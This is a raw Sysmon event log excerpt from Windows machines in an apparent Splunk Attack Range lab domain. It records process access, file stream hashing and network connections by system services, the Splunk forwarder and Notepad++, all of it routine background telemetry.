em32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.086{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\R
PCRT4.dll+1ae1c 10341000x80000000000000001049658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:18.071{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001049671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:19.586{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9D572658D8664E5C859EDB228C5D30,SHA256=5022B34EA681B26678E06D375B03E2F61D0F87D582E8A4D06AE3D684EDE8F898,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:19.122{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6C9B788D65CCEA1434B4399B497BDAD,SHA256=36E30CAA57986579FD9048C34116953191CA4A39FD0AB0339EF27C7F762DE903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:20.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F099CE74B360E8935A5B6C2E223BFE,SHA256=129F0A7A936568414798CE6B1B559EF1E8682FC60181BA7A99ADF2F4829313A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:20.544{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:20.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D43B14EC69649F7F92E8942674FCCB5,SHA256=99FFC05260726430DC42AAC2AD3E3D32678FFA983E6244D984BA6DA5861AA72C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:21.970{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075421MD5=FB65D6C1F8C0BBD38377AE359F2DD61A,SHA256=3BD9132356DA74C4826ED4866ECB3DDF33ADCB463C274422A80FF45C746C36EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:21.970{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=BEC53E6D4BE59D23EEBC911FA615E46C,SHA256=E223AAC236A5F16CA5D04404C205699C803B34647119E8DB1D59D561D10B6E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:21.855{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=7CDCC9313E6EDF43A3E6CF24C9909BC7,SHA256=EA63701E646483798C864221911377F4D66D4907C318AEE957898E42494C11E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:21.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76D87DB9A2FBB95CC1467C78C46D7ADF,SHA256=5951F8114846241FF4E9AB67BD73FB1A2979E56E0C10604A3F57489D9387DB70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:21.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A899BA2E30E86A6EC46283B870B137,SHA256=27E84164FC5AC9BF17AD8C9A0CD0FBECD1AADA2B2D9C57B8AA83A204BD5E0084,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:22.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0439134699D232368B70A37C122110DA,SHA256=8847F706C3A3861B29FBD450CF3C0E23B4EFDDC0D3CEDF5ED26748BEE52770C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:22.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D216B6F63BFA25564000702778FAC4A,SHA256=EDAE2B18AF91B6BDDA661C9529E291355D468ECFC0EDE1F17598169CA4DAE77D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:22.636{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65EB16BAE7A189CAD0F434D668588257,SHA256=5E3C851A4DD00CAE8A3DB67BE6D27FB5DB2271954D50489746734A733CD70F5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:22.200{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F2E59950568962CB78D379F88E2F96E,SHA256=1DFA0A78C69ABF26F2DB5BCF4446986031F8703E4860CA7228A1E370201290D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:14.596{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51058-false10.0.1.12-8000- 354300x8000000000000000807894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:20.664{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57292-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000807893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:20.255{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57291-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:23.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F330D62CCE5C5CD6DBBE8BD91A7ED6EC,SHA256=643209A79E9E2FCFF1516652C905C5004761AC1DE909C612330627A6202A67A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:23.216{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52473235AD74A54E6DDE25C92C2F0E6,SHA256=8B4A7D5865018333C7057549EC2B72F0C1DF5DAB43ADAB01DACA612872DA59C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:24.684{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D609692D57776E91E87A69B8DD8D7D0,SHA256=9A7D6C3EF97395A363F90152F8F4A09F880D7E05AD19EAA96831A2675F7A4DF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.450{0C1E0330-F530-60EB-8179-00000000D001}18802548C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 
